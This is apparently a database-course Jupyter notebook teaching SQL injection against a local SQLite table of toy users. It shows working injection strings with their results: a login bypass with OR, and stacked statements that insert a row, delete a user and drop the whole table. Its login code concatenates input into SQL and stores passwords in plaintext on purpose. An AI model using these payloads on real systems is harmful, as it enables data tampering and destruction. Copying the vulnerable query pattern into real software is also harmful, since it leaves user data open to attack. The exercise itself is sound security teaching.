# SQL Injection Activity

In [1]:
%load_ext sql
%sql sqlite://

/Users/zhangrao/.local/lib/python2.7/site-packages/IPython/config.py:13: ShimWarning: The `IPython.config` package has been deprecated. You should import from traitlets.config instead.
  "You should import from traitlets.config instead.", ShimWarning)
/Users/zhangrao/.local/lib/python2.7/site-packages/IPython/utils/traitlets.py:5: UserWarning: IPython.utils.traitlets has moved to a top-level traitlets package.
  warn("IPython.utils.traitlets has moved to a top-level traitlets package.")

'Connected: None@None'

## Table Creation

In [2]:
%sql DROP TABLE IF EXISTS users
%sql CREATE TABLE IF NOT EXISTS users(name VARCHAR(255), password VARCHAR(255))
names = ['alice', 'bob', 'chris', 'alex', 'jessie', 'sarah', 'jason']
passwords = ['cs145', 'databases', 'stanford', 'cardinal', 'password', 'abc123', 'sql']
for (n,p) in zip(names,passwords):
    %sql INSERT INTO users(name, password) VALUES (:n, :p)

Done.
Done.
1 rows affected.
1 rows affected.
1 rows affected.
1 rows affected.
1 rows affected.
1 rows affected.
1 rows affected.

## Sign Up
You can also insert your own login and password! (Note: this is not secure so please don't put any real passwords)

Execute the cell below to create your own login

In [3]:
print "Welcome to our sign up page! Please enter your information below."
username = raw_input("username: ")
password = raw_input("password: ")
%sql INSERT INTO users(name, password) VALUES (:username, :password)
print "Sign up successful! Please try logging in below"

Welcome to our sign up page! Please enter your information below.
username: zr
password: zr
1 rows affected.
Sign up successful! Please try logging in below

Check to see your login info should now be in the table!

In [4]:
%sql SELECT * FROM users

Done.

[(u'alice', u'cs145'),
 (u'bob', u'databases'),
 (u'chris', u'stanford'),
 (u'alex', u'cardinal'),
 (u'jessie', u'password'),
 (u'sarah', u'abc123'),
 (u'jason', u'sql'),
 (u'zr', u'zr')]

## Login
Below is a *highly* simplified view of the backend of a website login service.

Run the cell below to test it out!

In [5]:
username = raw_input("username: ")
password = raw_input("password: ")
result = %sql SELECT password FROM users WHERE name= :username
if (username != "" and password != "" and len(result) > 0 and result[0][0] == password):
    print "Login successful!"
else:
    print "Go away hacker!" #probably do something more menacing in production

username: zr
password: zr
Done.
Login successful!

-----------------------------
Now time for some hacking! Well, sort of. Notice that the value for "username" is directly substituted into the sql expression above for checking the user's password. So what would happen if we use the value

> `username:` ' ' OR password='password'

> `password:` password

##### Note: ipython-sqlite does not allow for substitution of whole strings into variables (which is actually a good thing from a security standpoint!), so these exercises may not work if you try to log in with them. For that reason we'll be writing the solution directly into the sql statements below.

In [6]:
# Think about what this query will do before running it (no need to modify anything, just think then run it)
username = "' ' OR password='password'"
password = "password"

query = "%sql SELECT password FROM users WHERE name=" + username
print query

%sql SELECT password FROM users WHERE name=' ' OR password='password'

In [7]:
#Paste the code here to run and test it (and think about what the result implies)
%sql SELECT password FROM users WHERE name=' ' OR password='password'

Done.

[(u'password',)]

## Hack Away!

Now think about how a malicious hacker (not necessarily redundant) can use the idea of sql injection to cause harm to the underlying database. In particular, can you provide a combination of username and password that would lead to

> * `inserting a new tuple`
> * `deleting an existing tuple`
> * `deleting the entire table`

Hint: sql statements are separated by semicolons

Enter the username/password for each of the above 3 exercises below:

In [8]:
#Inserting a new tuple username: 'malicious', password: 'hacker' 
#(might be useful if the query is against a secret database users don't usually have access to)
username = "'';INSERT INTO users(password, name) values('malicious', 'hacker');"
password = ""

#Don't modify below this comment
query = "%sql SELECT password FROM users WHERE name=" + username;
print query

%sql SELECT password FROM users WHERE name='';INSERT INTO users(password, name) values('malicious', 'hacker');

After running the cell above, copy the output into the cell below and run it!

In [9]:
#Paste the code here to run and test it
%sql SELECT password FROM users WHERE name='';INSERT INTO users(password, name) values('malicious', 'hacker');

Done.
1 rows affected.

[]

In [10]:
#Now run this cell to make sure it worked!
%sql SELECT * FROM users;

Done.

[(u'alice', u'cs145'),
 (u'bob', u'databases'),
 (u'chris', u'stanford'),
 (u'alex', u'cardinal'),
 (u'jessie', u'password'),
 (u'sarah', u'abc123'),
 (u'jason', u'sql'),
 (u'zr', u'zr'),
 (u'hacker', u'malicious')]

In [11]:
#Deleting an existing tuple (specifically, alice)
username = "'';DELETE FROM users WHERE name='alice'"
password = ""

#Don't modify below this comment
query = "%sql SELECT password FROM users WHERE name=" + username;
print query

%sql SELECT password FROM users WHERE name='';DELETE FROM users WHERE name='alice'

After running the cell above, copy the output into the cell below and run it!

In [12]:
#Paste the code here to run and test it
%sql SELECT password FROM users WHERE name='';DELETE FROM users WHERE name='alice'

Done.
1 rows affected.

[]

In [13]:
#Now run this cell to make sure it worked!
%sql SELECT * FROM users;

Done.

[(u'bob', u'databases'),
 (u'chris', u'stanford'),
 (u'alex', u'cardinal'),
 (u'jessie', u'password'),
 (u'sarah', u'abc123'),
 (u'jason', u'sql'),
 (u'zr', u'zr'),
 (u'hacker', u'malicious')]

In [14]:
#Deleting the entire table
username = "'';DROP TABLE users"
password = ""

#Don't modify below this comment
query = "%sql SELECT password FROM users WHERE name=" + username;
print query

%sql SELECT password FROM users WHERE name='';DROP TABLE users

After running the cell above, copy the output into the cell below and run it!

In [15]:
#Paste the code here to run and test it
%sql SELECT password FROM users WHERE name='';DROP TABLE users

Done.
Done.

[]

In [16]:
#Now run this cell to make sure it worked!
%sql SELECT * FROM users;

(sqlite3.OperationalError) no such table: users [SQL: u'SELECT * FROM users;']

For more info on sql injection, check out https://en.wikipedia.org/wiki/SQL_injection